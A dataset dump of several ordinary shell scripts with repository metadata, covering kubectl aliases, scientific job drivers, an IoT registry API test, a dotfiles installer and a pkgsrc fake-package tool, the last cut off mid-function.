blob_id
stringlengths 40
40
| language
stringclasses 1
value | repo_name
stringlengths 4
115
| path
stringlengths 2
970
| src_encoding
stringclasses 28
values | length_bytes
int64 31
5.38M
| score
float64 2.52
5.28
| int_score
int64 3
5
| detected_licenses
listlengths 0
161
| license_type
stringclasses 2
values | text
stringlengths 31
5.39M
| download_success
bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|
b4d9f76b1f39dde54769b27c233ff8e9c0def54b
|
Shell
|
velcrine/vorishirne
|
/bash/k8.sh
|
UTF-8
| 815
| 2.671875
| 3
|
[] |
no_license
|
alias kg="kubectl get"
alias kga="kubectl get-all"
alias kd="kubectl delete"
alias ke="kubectl edit"
alias kesc="kubectl modify-secret"
alias kl="kubectl logs -f"
alias kx="kubectl exec -it"
alias ka="kubectl apply -f"
alias kw="watch kubectl get"
alias ky="kubectl get -o yaml"
alias helm3="helm"
KUBECONFIG_DIR="/vorishirne/all/repository/aaorg/kubeconfigs"
export KUBECONFIG="$KUBECONFIG_DIR/dev/config-notthere"
# Select a kubeconfig: k8 <name> [env]
# Exports KUBECONFIG=$KUBECONFIG_DIR/<env>/config-<name> (env defaults to
# "dev") and echoes the resulting path.
# Fixes: variables made local so they no longer leak into the calling
# shell's environment, and expansions are quoted.
function k8() {
  local config_name="$1"
  local config_dir="${2:-dev}"
  export KUBECONFIG="$KUBECONFIG_DIR/$config_dir/config-$config_name"
  echo "$KUBECONFIG"
}
# Pin a namespace without touching the original kubeconfig: knx <namespace>
# Copies the active kubeconfig to <config>-<ns>, points KUBECONFIG at the
# copy, then records the namespace in the copy's current context.
# Fixes: all expansions quoted (paths with spaces previously broke the
# cat/redirect and the kubectl call).
function knx() {
  cat "$KUBECONFIG" > "${KUBECONFIG}-$1"
  export KUBECONFIG="${KUBECONFIG}-$1"
  kubectl config set-context --current --namespace="$1"
  echo "$KUBECONFIG"
}
# Set the namespace for the current context in the active kubeconfig:
# kns <namespace>. Unlike knx(), this edits the config file in place.
# Fix: quote "$1" so namespace arguments are passed through verbatim.
function kns() {
  kubectl config set-context --current --namespace="$1"
}
| true
|
72b048aa4606a364a4548ef519df18e7ec2e7f28
|
Shell
|
tmellan/scripts_imp
|
/runTI.sh
|
UTF-8
| 1,671
| 2.828125
| 3
|
[] |
no_license
|
#!/bin/bash
# Thermodynamic-integration job driver: builds a directory tree
# <nPairs>/<vols>/<sizes>/<T>/lambda<l>, stages inputs from $dir/INPUT, and
# launches one background integrate_TU-TILD_SUPERFAST.x run per
# (temperature, lambda) point.
lambdaList="0.0 0.1 0.2 0.3 0.4 0.5 0.6 0.7 0.8 0.9 1.0"
dir=`pwd`
# Temperatures (K, presumably — TODO confirm) and per-temperature MD steps;
# stepList is indexed by position in TList via the counter d.
TList="500 1000 1500 2000"
S=20000
stepList=(20000 20000 20000 20000)
d=-1
name="r1"
# Example of a potparas file name assembled below from $l, $k, $v:
#potparas_33_mixed-wtest-4_3_9393254559_0a0c
nPairs="33"
vols="0a0c"
sizes="mixed-wtest-4_3_9393254559"
for l in $nPairs; do
if [ ! -d $l ]; then mkdir $l ; fi ; cd $l
for v in $vols; do
if [ ! -d $v ]; then mkdir $v ; fi ; cd $v
for k in $sizes; do
if [ ! -d $k ]; then mkdir $k ; fi ; cd $k
d=-1
for j in $TList; do
if [ ! -d $j ]; then mkdir $j ; fi ; cd $j
let d=d+1
c=0
for i in $lambdaList; do
let c=c+1
if [ ! -d lambda$i ]; then mkdir lambda$i ; fi ; cd lambda$i
# Stage Hessian, structure, settings and potential parameters for this point.
cp $dir/INPUT/HesseMatrix_sphinx_$v HesseMatrix_sphinx && cp $dir/INPUT/POSCAR_$v POSCAR
cp $dir/INPUT/settings_$l settings && cp $dir/INPUT/potBest/"potparas_"$l"_"$k"_"$v potparas
# Pseudo-random seed from the nanosecond clock, reduced modulo a large prime-ish constant.
s=`date +%N | awk '{printf "%7d",$1%942438976}'`
# Instantiate the INCAR template, substituting lambda, temperature, step count and seed.
sed -e 's|xxxLAMBDAxxx|'$i'|' \
-e 's|xxxTEMPxxx|'$j'|' \
-e 's|xxxSTEPSxxx|'${stepList[$d]}'|' \
-e 's|xxxSEEDxxx|'"$s"'|' $dir/INPUT/INCAR > INCAR
sed -i 's/= 0.01/= 0.05/g' INCAR
# NOTE(review): this substitution is a no-op ('= 1' -> '= 1'); possibly a
# leftover knob whose replacement value was reverted.
sed -i 's/= 1/= 1/g' INCAR
# NOTE(review): '2>&1 > 1.out' sends stderr to the terminal, not to 1.out;
# if stderr should be captured, the order must be '> 1.out 2>&1'.
nice -20 integrate_TU-TILD_SUPERFAST.x 2>&1 > 1.out &
cd $dir/$l/$v/$k/$j
done
cd $dir/$l/$v/$k
echo done $j/$k
done
cd $dir/$l/$v
done
cd $dir/$l
done
cd $dir
done
| true
|
042ad5854138146f9faa4a04c4d630ca067af4d0
|
Shell
|
Hi-PACE/hipace
|
/tests/hosing.2Rank.sh
|
UTF-8
| 1,422
| 2.875
| 3
|
[
"BSD-2-Clause",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
#! /usr/bin/env bash
# Copyright 2021
#
# This file is part of HiPACE++.
#
# Authors: AlexanderSinn, MaxThevenet, Severin Diederichs
# License: BSD-3-Clause-LBNL
# This file is part of the HiPACE++ test suite.
# It runs a Hipace simulation in the blowout regime and compares the result
# with SI units.
# abort on first encountered error
set -eu -o pipefail
# Read input parameters
HIPACE_EXECUTABLE=$1   # path to the hipace binary under test
HIPACE_SOURCE_DIR=$2   # path to the HiPACE++ source tree
HIPACE_EXAMPLE_DIR=${HIPACE_SOURCE_DIR}/examples/blowout_wake
HIPACE_TEST_DIR=${HIPACE_SOURCE_DIR}/tests
# Clear output from any previous run so the checksum only sees fresh data.
rm -rf hosing_data
# Run the simulation on 2 MPI ranks, overriding the example's inputs with a
# hosing-specific beam (offset via dx_per_dzeta) plus a background ion species.
mpiexec -n 2 $HIPACE_EXECUTABLE $HIPACE_EXAMPLE_DIR/inputs_normalized \
plasmas.sort_bin_size = 8 \
hipace.dt = 20 \
diagnostic.output_period = 10 \
beam.injection_type = fixed_weight \
beam.num_particles = 1000000 \
beam.density = 200 \
beam.position_std = 0.1 0.1 1.41 \
beam.dx_per_dzeta = 0.2 \
plasmas.names = plasma ions \
plasma.neutralize_background = 0 \
"ions.density(x,y,z)" = 1. \
ions.ppc = 1 1 \
ions.charge = 1 \
ions.mass = 1836 \
ions.neutralize_background = 0 \
hipace.file_prefix=hosing_data/ \
max_step=10
# Compare the results with checksum benchmark
# (particle ids are skipped: they are not stable across runs/ranks).
$HIPACE_TEST_DIR/checksum/checksumAPI.py \
--evaluate \
--file_name hosing_data/ \
--test-name hosing.2Rank \
--skip "{'beam': 'id'}"
| true
|
b04985e3e08818bbde3b267baa4e5c7002585cb2
|
Shell
|
jiarong/seqdep
|
/examples/10k.fq.bz2.sh
|
UTF-8
| 2,269
| 2.8125
| 3
|
[
"BSD-2-Clause"
] |
permissive
|
#! /bin/bash
#PBS -q main
#PBS -l nodes=1:ppn=1,walltime=4:00:00
#PBS -l mem=21gb
#PBS -j oe
# Sequencing-redundancy pipeline (PBS batch job): trims and subsamples reads,
# builds a khmer k-mer counting table, computes per-read median k-mer
# abundance, subsamples representatives, fits a redundancy curve and reports
# the fitted parameters via an R script.
Readfile=../tests/test-data/10k.fq.bz2
# parameters to samples data for curve
Start=0
End=1
Steps=100
Reps=10
Trimmed_length=90
# Subsample reads from original read data
Subsample_seq_num=1000000
# Subsample representatives from abundance table
Subsample_rep_num=500000
Scriptdir=/mnt/home/guojiaro/Documents/software/gits/seqdep/scripts
Ksize=21
Hashsize=1000000000
#
# change parameters above
#
# big count use 2Byte for each kmer;
# (Hashsize * 2 bytes * 4 tables, reported in GB — matches -N 4 below.)
Hashmem=$(echo "scale=2; $Hashsize*2*4/1000000000" | bc)
echo "$Hashmem Gb is used for hashtable"
set -e
module load screed
module load NumPy
module load khmer/1.3
Bname=$(basename $Readfile)
# Resolve Readfile to an absolute path before cd'ing into the output dir.
Readfile=$(cd "$(dirname $Readfile)" && pwd)/$(basename $Readfile)
Outdir=$Readfile.seqdep.out
mkdir -p $Outdir
cd $Outdir
echo "loading counting table.."
# Trim/subsample, keep a copy of the sampled reads via tee, and stream them
# into khmer's counting table in one pass.
python $Scriptdir/trim-seq-by-len.py $Readfile $Trimmed_length $Subsample_seq_num /2 - |\
tee $Bname.subseq.$Subsample_seq_num | \
load-into-counting.py -k $Ksize -x $Hashsize -N 4 $Bname.subseq.$Subsample_seq_num.ht -
echo "loading counting table finished.."
echo "start counting median kmer.."
count-median.py $Bname.subseq.$Subsample_seq_num.ht $Bname.subseq.$Subsample_seq_num $Bname.subseq.$Subsample_seq_num.K${Ksize}.medcount
echo "finish counting median kmer.."
echo "$Subsample_rep_num reps from $Subsample_seq_num are used for getting redundancy data before curve fitting"
Sweep_ratio=$(echo "scale=1; $Subsample_seq_num/$Subsample_rep_num" | bc)
python $Scriptdir/subsample-line.py $Bname.subseq.$Subsample_seq_num.K${Ksize}.medcount $Subsample_rep_num $Bname.subseq.$Subsample_seq_num.K${Ksize}.medcount.subrep.$Subsample_rep_num
echo "start making .npo file.."
python $Scriptdir/redunancy-curve.py $Bname.subseq.$Subsample_seq_num.K${Ksize}.medcount.subrep.$Subsample_rep_num $Start $End $Steps $Reps > $Bname.subseq.$Subsample_seq_num.K${Ksize}.medcount.subrep.$Subsample_rep_num.curve
echo "finish making .npo file.."
Rscript $Scriptdir/seqdep.R $Bname.subseq.$Subsample_seq_num.K${Ksize}.medcount.subrep.$Subsample_rep_num.curve $Sweep_ratio > $Bname.subseq.$Subsample_seq_num.K${Ksize}.medcount.subrep.$Subsample_rep_num.curve.R.params
# Report the job's final resource usage in the PBS log.
qstat -f ${PBS_JOBID}
| true
|
98484022c68fad092e831304556f184ed460db19
|
Shell
|
Trusted-IoT-Alliance/IOTRegistrySwagger
|
/test/possess.sh
|
UTF-8
| 4,006
| 2.625
| 3
|
[] |
no_license
|
#!/bin/bash
# Smoke test for the IOTRegistry REST API: creates tokens under a popcode,
# then transfers ("possesses") the newest output to a second owner. Each
# mutating call first fetches the popcode's counter seed, asks the service
# to sign the request, and finally submits the signed operation.
# Requires: curl, node (used to extract fields from the JSON responses).
# Fixes vs. original: removed a stray '\ ' that passed a lone-space argument
# to curl; error paths now 'exit 1' instead of bare 'exit' (which returned
# the 0 status of the preceding echo); corrected the copy-pasted error
# message for a missing output index; URLs consistently use $HOST.
set -e
HOST=hl-sk-j-040.brackets.trade:8081
# Throwaway test keys/addresses for the test service.
USERAPUBK=0318b8d3f9d2889ee18dd8a48bfdb539ffff4b7498864e7071addd1edb225690e3
USERAPRIVK=dc030fcfc70a24a1086421d4fc43b927dc29c7df87e4d87a6ee2ed76cf7a75d7
USERAADDR=c535bbbf772521e84c8da4378d1b21e6a4578d37
USERBPUBK=0225e0c73e75ce512f14054d9629107b9b1365d0533248b6fb9da9987ea673dcef
USERBPRIVK=de8e3f1b60c6d147c88c976f1d45e11dbcd5f09eb06f96f226cf1a9b337003d5
USERBADDR=271e7290a25454222b556aadb61bdf832cf3d3b3
# NOTE(review): the next three assignments are immediately overwritten by
# the block after them; the second group was probably meant to be POPCODEB*.
# Preserved as-is so effective behavior (only the second set counts) is
# unchanged — confirm intent before renaming.
POPCODEAPUBK=0246bcbefe3cb4a848ec801b3eb13e9fedc874a53f449d9c5f57c5de7fec8823ce
POPCODEAPRIVK=13874f54991ceb3f7f0b0169fc5f48fa90b3ec27d50c762961d53b28424c1de9
POPCODEAADDR=ccd652f622d8d63127babb4c4e34f8c831136adc
POPCODEAPUBK=0297bb72d581a99abb4b006fac0403871c9ec3b54ce303d2709864752bdf867350
POPCODEAPRIVK=16f8ef102297bdf5c3fddbbf443eb7ff74ba0450b867d2d0bab6b1c826e62250
POPCODEAADDR=4f967c63925015fc9186231d739c6ad185dc0f4c
# Get Balance (yields the counter seed needed to sign the create request)
echo get balance
result=$(curl -f -s -X GET --header 'Accept: application/json' "http://$HOST/v1/balance?PopcodeAddress=$POPCODEAADDR")
# Escape backslashes so the JSON survives embedding in a JS string literal.
result=$(echo "$result" | sed 's/\\/\\\\\\/g')
CounterSeedStr=$(echo "console.log(JSON.parse('$result').Counter)" | node)
echo "$CounterSeedStr"
if [ -z "$CounterSeedStr" ] ; then
echo Missing counter seed string
exit 1
fi
echo
# Get signature for create
echo create signature
echo "http://$HOST/v1/generateCreateSig?CounterSeedStr=$CounterSeedStr&Amount=10&Data=1&Type=1&PopcodeAddress=$POPCODEAADDR&CreatorPrivateKey=$USERAPRIVK"
result=$(curl -f -s -X POST --header 'Accept: text/html' \
"http://$HOST/v1/generateCreateSig?CounterSeedStr=$CounterSeedStr&Amount=10&Data=1&Type=1&PopcodeAddress=$POPCODEAADDR&CreatorPrivateKey=$USERAPRIVK")
SIG=$(echo "console.log(JSON.parse('$result').sig)" | node)
echo signature "$SIG"
if [ -z "$SIG" ] ; then
echo "did not get signature"
exit 1
fi
echo
# Submit the signed create (mints 10 tokens under the popcode).
echo "http://$HOST/v1/create?PopcodeAddress=$POPCODEAADDR&Amount=10&Data=1&Type=1&CreatorPubKey=$USERAPUBK&CreatorSig=$SIG"
result=$(curl -f -s -X POST --header 'Content-Type: application/json' --header 'Accept: application/json' \
"http://$HOST/v1/create?PopcodeAddress=$POPCODEAADDR&Amount=10&Data=1&Type=1&CreatorPubKey=$USERAPUBK&CreatorSig=$SIG")
result=$(echo "console.log(JSON.parse('$result').result)" | node)
if [ -z "$result" ] ; then
echo "missing result"
exit 1
fi
echo
# Get Balance again: fresh counter seed plus the index of the newest output.
echo get balance
result=$(curl -f -s -X GET --header 'Accept: application/json' "http://$HOST/v1/balance?PopcodeAddress=$POPCODEAADDR")
result=$(echo "$result" | sed 's/\\/\\\\\\/g')
CounterSeedStr=$(echo "console.log(JSON.parse('$result').Counter)" | node)
Output=$(echo "console.log(JSON.parse('$result').Outputs.length - 1)" | node)
echo Counter Seed Str "$CounterSeedStr"
echo Output "$Output"
if [ -z "$CounterSeedStr" ] ; then
echo Missing counter seed string
exit 1
fi
if [ -z "$Output" ] ; then
echo Missing output index
exit 1
fi
echo
# Generate Possess Signature
echo Generate Possess Signature
echo "http://$HOST/v1/generatePossessSig?CounterSeedStr=$CounterSeedStr&Output=$Output&Data=1&NewOwnersPubKeys=$USERBPUBK&PopcodePrivateKey=$POPCODEAPRIVK"
result=$(curl -f -s -X POST --header 'Content-Type: application/json' --header 'Accept: application/json' \
"http://$HOST/v1/generatePossessSig?CounterSeedStr=$CounterSeedStr&Output=$Output&Data=1&NewOwnersPubKeys=$USERBPUBK&PopcodePrivateKey=$POPCODEAPRIVK")
SIG=$(echo "console.log(JSON.parse('$result').sig)" | node)
if [ -z "$SIG" ] ; then
echo "did not get signature"
exit 1
fi
echo
# Possess: transfer the output to user B.
# NOTE(review): -f is omitted here, unlike earlier calls — presumably so a
# server error body is still printed; confirm before adding it.
echo Possess
echo "http://$HOST/v1/possess?PopcodeAddress=$POPCODEAADDR&Data=1&PopcodePubKey=$POPCODEAPUBK&PopcodeSig=$SIG&NewOwnersPubKeys=$USERBPUBK&Output=$Output"
result=$(curl -s -X POST --header 'Content-Type: application/json' --header 'Accept: application/json' \
"http://$HOST/v1/possess?PopcodeAddress=$POPCODEAADDR&Data=1&PopcodePubKey=$POPCODEAPUBK&PopcodeSig=$SIG&NewOwnersPubKeys=$USERBPUBK&Output=$Output")
echo "$result"
| true
|
b49cc8974628ce517b2e5ffd03ee980be93dc615
|
Shell
|
phrac/dotfiles
|
/scripts/bin/cmus.sh
|
UTF-8
| 395
| 2.9375
| 3
|
[] |
no_license
|
#!/bin/sh
# Print "artist - title (status-icon)" for the current cmus track, with no
# trailing newline (intended for a status bar).
# Fixes: the original 'if [[ $s = "playing" ]] then' was a syntax error
# (missing ';' before 'then') and used the bash-only '[[' under #!/bin/sh;
# replaced with a portable, quoted '[ ... ]; then'.
echo -n `cmus-remote -Q | grep "tag artist" | sed s/"tag artist"/""/g | sed '1s/^.//' | head -n 1`
echo -n " - "
echo -n `cmus-remote -Q | grep "tag title" | sed s/"tag title"/""/g | sed '1s/^.//'`
echo -n " ("
s=`cmus-remote -Q | grep "status" | sed s/"status"/""/g | sed '1s/^.//'`
if [ "$s" = "playing" ]; then
# NOTE(review): both branches assign an empty string — the original icon
# glyphs were likely lost in a re-encoding; restore them if known.
status=""
else
status=""
fi
echo -n $status
echo -n ")"
| true
|
3e23886c4481805917254813808c73777924a034
|
Shell
|
ankurdave/dotfiles
|
/bin/setup
|
UTF-8
| 5,792
| 3.703125
| 4
|
[] |
no_license
|
#!/bin/bash
# Dotfiles installer: links configuration files into $HOME (backing up old
# real files to ~/config-old/) and, on macOS, applies system preferences.
set -eu
# Absolute path to the dotfiles repository root (parent of this bin/ dir).
dotfiles=$(cd $(dirname $0)/.. && pwd)
# Succeed when the given name resolves to a runnable command (binary,
# builtin, function or alias); all output is discarded.
command_exists () {
  if type "$1" > /dev/null 2>&1; then
    return 0
  else
    return 1
  fi
}
# symlink <file> <target> — create/replace a symlink at <target> pointing to
# <file>. A pre-existing real file at <target> is first moved into
# ~/config-old/; a pre-existing symlink is simply deleted (assumed to be
# from a previous run of this script).
# Fix: file/target are now 'local' so they no longer clobber globals of the
# same name in the calling script.
symlink () {
  local file=$1
  local target=$2

  # Back up real files (not symlinks) to ~/config-old/
  if [[ -e "$target" && ! -L "$target" ]]
  then
    echo "Moving old version of $target to ~/config-old/$(basename "$file")"
    mkdir -p ~/config-old/
    mv "$target" ~/config-old/
  fi

  # Just delete symlinks, because they are probably from a previous run
  if [[ -L "$target" ]]
  then
    rm "$target"
  fi

  echo "Symlinking $target"
  ln -s "$file" "$target"
}
# hardlink <file> <target> — hard-link <file> to <target>, first backing up
# any existing file at <target> into ~/config-old/ (skipped when <target>
# already shares an inode with the backup, i.e. on repeated runs).
# Fix: file/target are now 'local' so they no longer clobber globals of the
# same name in the calling script.
hardlink () {
  local file="$1"
  local target="$2"

  # Back up files to ~/config-old/
  if [[ -e "$target" ]]
  then
    echo "Moving old version of $target to ~/config-old/$(basename "$file")"
    mkdir -p ~/config-old/
    # -ef: same device and inode — target already IS the backup.
    if ! [[ "$target" -ef ~/config-old/"$(basename "$target")" ]]; then
      mv "$target" ~/config-old/
    fi
  fi

  echo "Hardlinking $target"
  ln -f "$file" "$target"
}
if [ -d "$HOME/Dropbox/history" ]; then
symlink $HOME/Dropbox/history ~/history
else
mkdir -p ~/history
fi
# Link dotfiles into ~ and back up the old dotfiles into ~/config-old
find "$dotfiles" -mindepth 1 -maxdepth 1 -not \( \
-iname '*~' -or \
-iname '*#*' -or \
-iname '.hg' -or \
-iname '.git' -or \
-iname '.gitmodules' -or \
-iname 'bin' -or \
-iname 'misc' -or \
-iname 'afew' \
\) | while read file; do
symlink "$file" ~/"$(basename "$file")"
done
mkdir -p ~/.config/afew
find "$dotfiles"/misc/afew -mindepth 1 -maxdepth 1 | while read file; do
symlink "$file" ~/.config/afew/"$(basename "$file")"
done
mkdir -p ~/.sbt/0.13
symlink "$dotfiles"/misc/ctags.sbt ~/.sbt/0.13/ctags.sbt
mkdir -p ~/.ipython/profile_default
symlink "$dotfiles"/misc/ipython_kernel_config.py ~/.ipython/profile_default/ipython_kernel_config.py
# OS X setup
if [ -d ~/Library ] && command_exists defaults; then
brew bundle install --global --verbose
pip install --upgrade -r "$dotfiles"/misc/pip-global-requirements.txt
mkdir -p ~/Library/KeyBindings
hardlink "$dotfiles"/misc/DefaultKeyBinding.dict \
~/Library/KeyBindings/DefaultKeyBinding.dict
# Remap Apple internal keyboard to Dvorak. Regenerate this file as follows:
# git clone github.com:ankurdave/KE-complex_modifications
# cd KE-complex_modifications
# make
# cp public/json/dvorak_for_apple_internal_keyboard.json ~/repos/dotfiles/misc/
mkdir -p ~/.config/karabiner/assets/complex_modifications
hardlink "$dotfiles"/misc/dvorak_for_apple_internal_keyboard.json \
~/.config/karabiner/assets/complex_modifications/dvorak_for_apple_internal_keyboard.json
mkdir -p ~/Library/Preferences
hardlink "$dotfiles"/misc/com.googlecode.iterm2.plist \
~/Library/Preferences/com.googlecode.iterm2.plist
# Launch agents
find "$dotfiles"/misc -mindepth 1 -maxdepth 1 \
-name 'com.ankurdave.*.plist' | while read file; do
hardlink "$file" ~/Library/LaunchAgents/"$(basename "$file")"
done
## From https://github.com/mathiasbynens/dotfiles/blob/master/.macos:
# Disable the sound effects on boot
sudo nvram SystemAudioVolume=" "
# Disable Resume system-wide
defaults write com.apple.systempreferences NSQuitAlwaysKeepsWindows -bool false
# Enable full keyboard access for all controls
# (e.g. enable Tab in modal dialogs)
defaults write NSGlobalDomain AppleKeyboardUIMode -int 3
# Faster keyboard repeat rate
defaults write -g ApplePressAndHoldEnabled -bool false
defaults write NSGlobalDomain KeyRepeat -int 2
defaults write NSGlobalDomain InitialKeyRepeat -int 15
# Finder: show hidden files by default
defaults write com.apple.finder AppleShowAllFiles YES
defaults write NSGlobalDomain AppleShowAllExtensions YES
# Disable the warning when changing a file extension
defaults write com.apple.finder FXEnableExtensionChangeWarning -bool false
# Use list view in all Finder windows by default
# Four-letter codes for the other view modes: `icnv`, `clmv`, `Flwv`
defaults write com.apple.finder FXPreferredViewStyle -string "Nlsv"
# Speed up Mission Control animations
defaults write com.apple.dock expose-animation-duration -float 0.1
# Prevent Photos from opening automatically when devices are plugged in
defaults -currentHost write com.apple.ImageCapture disableHotPlug -bool true
# Disable local Time Machine backups
#hash tmutil &> /dev/null && sudo tmutil disablelocal
# Disable Spotlight indexing for any volume that gets mounted and has not yet
# been indexed before.
# Use `sudo mdutil -i off "/Volumes/foo"` to stop indexing any volume.
#sudo defaults write /.Spotlight-V100/VolumeConfiguration Exclusions -array "/Volumes"
# Don’t prompt for confirmation before downloading
defaults write org.m0k.transmission DownloadAsk -bool false
defaults write org.m0k.transmission MagnetOpenAsk -bool false
# IP block list.
# Source: https://giuliomac.wordpress.com/2014/02/19/best-blocklist-for-transmission/
defaults write org.m0k.transmission BlocklistNew -bool true
defaults write org.m0k.transmission BlocklistURL -string "http://john.bitsurge.net/public/biglist.p2p.gz"
defaults write org.m0k.transmission BlocklistAutoUpdate -bool true
# Bottom left screen corner puts display to sleep
defaults write com.apple.dock wvous-bl-corner -int 10
defaults write com.apple.dock wvous-bl-modifier -int 0
# Other prefs
defaults write com.apple.finder CreateDesktop false
defaults write -app Skim SKAutoReloadFileUpdate -boolean true
git lfs install
fi
| true
|
77031dcc7fffa23fb38430fc198018eec8bb538e
|
Shell
|
yoonseongduk/script
|
/initial/012_iplinfo.sh
|
UTF-8
| 2,074
| 3.21875
| 3
|
[] |
no_license
|
#!/bin/bash
#################################################################################
# #
# Script Name: 012_iplinfo.sh #
# #
# Description: xxxxxxxxxxxxxxxxxxxx script #
# #
# Modified: #
# #
# 2015.01.16 SAL_SUM:35142 #
# created by root #
# #
# Licensed Materials - Property of LG CNS #
# #
# (C) COPYRIGHT LG CNS Co., Ltd. 2009 #
# All Rights Reserved #
# #
#################################################################################
typeset GDC=${GDC:-isc}                 # site/data-center code, defaults to "isc"
typeset source_ip=${source_ip:-"v1"}    # ssh host/alias to fetch the iplinfo tools from
logdir=/${GDC}/logs001/initial_setup
# Log file named <script>.<YYYYMMDD>.<HHMMSS>
logfile=$(basename $0).$(date +%Y%m%d).$(date +%H%M%S)
logdf=$logdir/$logfile
mkdir -p $logdir
# Copy the iplinfo binary and its init script from the source host, install
# the init script, register it with update-rc.d, start the service, and run
# the tool once. 'set -xv' traces every command into the log.
function main_rtn {
set -xv
cd /usr/local/bin
scp -i ~/.ssh/id_rsa.v1 ${source_ip}:/isc/sorc001/root/shell/initial/iplinfo .
scp -i ~/.ssh/id_rsa.v1 ${source_ip}:/isc/sorc001/root/shell/initial/iplinfo_Sxx .
cp /usr/local/bin/iplinfo_Sxx /etc/init.d/iplinfo
update-rc.d iplinfo defaults
/etc/init.d/iplinfo start
/usr/local/bin/iplinfo
set +xv
}
# Run, appending combined stdout/stderr to the timestamped log file.
main_rtn 2>&1 | tee -a $logdf
# SAL_SUM:35142:2015.01.16 Do not delete this line
| true
|
3f6c781ef49e00a96ef4025323de4eb98f93f0c0
|
Shell
|
NetBSD/pkgsrc-wip
|
/pkg_fake/files/pkg_fake
|
UTF-8
| 7,485
| 4.03125
| 4
|
[] |
no_license
|
#!/bin/sh
#
# author: pancake@phreaker.net
#
# installs or removes fake packages into the pkgsrc database.
# creates and manages fake alternatives on pkgsrc.
# allows to hide and show packages from the pkgsrc database.
# variable initialization #
# @PREFIX@/@PKGDB@/@PKGSRC@ are placeholders substituted by the pkgsrc
# framework when the script is installed.
PREFIX=@PREFIX@
PKGDB=@PKGDB@
PKGSRC=@PKGSRC@
# Hidden packages are parked in a sibling directory of the pkg database.
PKGHIDE=${PKGDB}/../pkg_hide
# Editor used for +ALTERNATIVES files; honor $EDITOR, fall back to vi.
if [ -z "${EDITOR}" ]; then
EDITOR=vi
fi
# help functions #
# Print the usage/option summary to stdout.
# NOTE(review): the heredoc text contains typos ("hidding", "Autocomplenting"
# elsewhere) that are user-visible runtime strings; left untouched here.
show_help()
{
cat <<EOF
Usage: pkg_fake [-aAclLprRihH] [pkgname]
Version: 0.3
fake packages:
-a : append files to the target fake package PLIST.
-c : clears target package fake PLIST.
(useful for pkg_fake -p ezm3 | pkg_fake -a ezm3)
-i : install a new fake package.
-l : list all fake packages.
-p : shows the PLIST of an installed or not package.
-r : remove a fake package.
fake alternatives:
-A : adds fake alternatives to a package.
-L : list all fake alternatives.
-R : remove fake alternative support to a package.
hidding utilities:
-h : hides the desired package.
-H : list all hide packages.
-u : unhide the selected package.
EOF
}
# Create the hidden-package directory, aborting the script on failure.
# Fixes: the original wrapped the failure path in a ( subshell ), so its
# 'exit 1' never terminated the caller; and '2>&1 >/dev/null' sent stderr to
# the old stdout instead of silencing it.
init_hide()
{
	if ! mkdir -p "${PKGHIDE}" >/dev/null 2>&1; then
		echo "Cannot create '${PKGHIDE}' directory." >&2
		exit 1
	fi
}
# Remove the hidden-package directory again once it is empty.
# Fixes: quoted expansions, $(...) instead of backticks, an explicit -d
# check so a missing directory no longer spews an ls error, and corrected
# '2>&1 >/dev/null' redirection order.
fini_hide()
{
	if [ -d "${PKGHIDE}" ] && [ -z "$(ls "${PKGHIDE}")" ]; then
		rm -rf "${PKGHIDE}" >/dev/null 2>&1
	fi
}
# Print "name<TAB><TAB>comment" for every fake package (marked by a +FAKE
# file) in the pkg database. Changes the working directory to ${PKGDB}, as
# the original did.
# Fixes: glob iteration instead of parsing `ls`, quoted expansions, and a
# printf format string so '%' or '\' in a comment is printed verbatim.
list_all()
{
	cd "${PKGDB}" || return 1
	for pkg in *
	do
		if [ -e "${pkg}/+FAKE" ]; then
			printf '%s\t\t%s\n' "${pkg}" "$(cat "${pkg}/+COMMENT")"
		fi
	done
}
# Print "name<TAB><TAB>comment" for every package carrying fake alternatives
# (marked by a +FAKE_ALT file). Changes the working directory to ${PKGDB},
# as the original did.
# Fixes: glob iteration instead of parsing `ls`, quoted expansions, and a
# printf format string so '%' or '\' in a comment is printed verbatim.
list_all_alternatives()
{
	cd "${PKGDB}" || return 1
	for pkg in *
	do
		if [ -e "${pkg}/+FAKE_ALT" ]; then
			printf '%s\t\t%s\n' "${pkg}" "$(cat "${pkg}/+COMMENT")"
		fi
	done
}
# Interactively edit a package's +ALTERNATIVES file with $EDITOR, then
# register it with pkg_alternatives(8). Blocks on 'read' (press Enter)
# before launching the editor.
edit_alternatives()
{
PKG="$1"
echo "Type in editor the wrapper lines in format:"
echo "\"bin/python /usr/pkg/bin/python2p3\""
echo
echo "press enter"
read
${EDITOR} "${PKGDB}/${PKG}/+ALTERNATIVES"
pkg_alternatives register "${PKGDB}/${PKG}/+ALTERNATIVES"
}
# Resolve a possibly-abbreviated package name ($1) against the directory
# listing of $2 and print the unique expansion on stdout:
#   - exactly one prefix match: print it (progress note on stderr)
#   - no match / ambiguous: print nothing; diagnostics on stderr
# The 'exit 1' calls only terminate the command-substitution subshell this
# helper is normally invoked in, so callers must test for empty output.
# Fixes: >&2 instead of the non-portable '>/dev/stderr', $(...) instead of
# backticks, quoted expansions, '-eq' for the word count (tolerates wc's
# BSD-style padding), and the "Autocomplenting" typo.
package_autocompletion()
{
	NAME=$1
	TDIR=$2
	# XXX this check is redundant (the dispatcher already requires an argument)
	if [ -z "${NAME}" ]; then
		echo "" >&2
		echo "Target package name is mandatory." >&2
		exit 1
	fi
	MAYBE="$(ls "${TDIR}" | grep "^${NAME}")"
	if [ 1 -eq "$(echo ${MAYBE} | wc -w)" ]; then
		echo "Autocompleting package name to: ${MAYBE}" >&2
		echo "${MAYBE}"
	else
		if [ -z "${MAYBE}" ]; then
			echo "Target package does not exists." >&2
		else
			echo "There'r more than one alternative for this package:" >&2
			echo ${MAYBE} >&2
			exit 1
		fi
	fi
}
# Reset a fake package's +CONTENTS to the minimal two-line header
# (@name and @cwd), discarding any files previously appended to its PLIST.
clear_contents()
{
	PKG=$1
	{
		echo "@name ${PKG}"
		echo "@cwd ${PREFIX}"
	} > ${PKGDB}/${PKG}/+CONTENTS
}
# Generate the PLIST of the pkgsrc package directory given as $1 by driving
# bmake's _GENERATE_PLIST / _PLIST_AWK_SCRIPT machinery.
# Fix: the function accepted $1 (PKGDIR) but then cd'd to ${PKGSRC}/${PKG},
# silently depending on the caller's global PKG variable; it now uses its
# own argument (both call sites pass ${PKGSRC}/${PKG}, so behavior at the
# existing call sites is unchanged).
print_plist()
{
	PKGDIR=$1
	cd "${PKGDIR}" || return 1
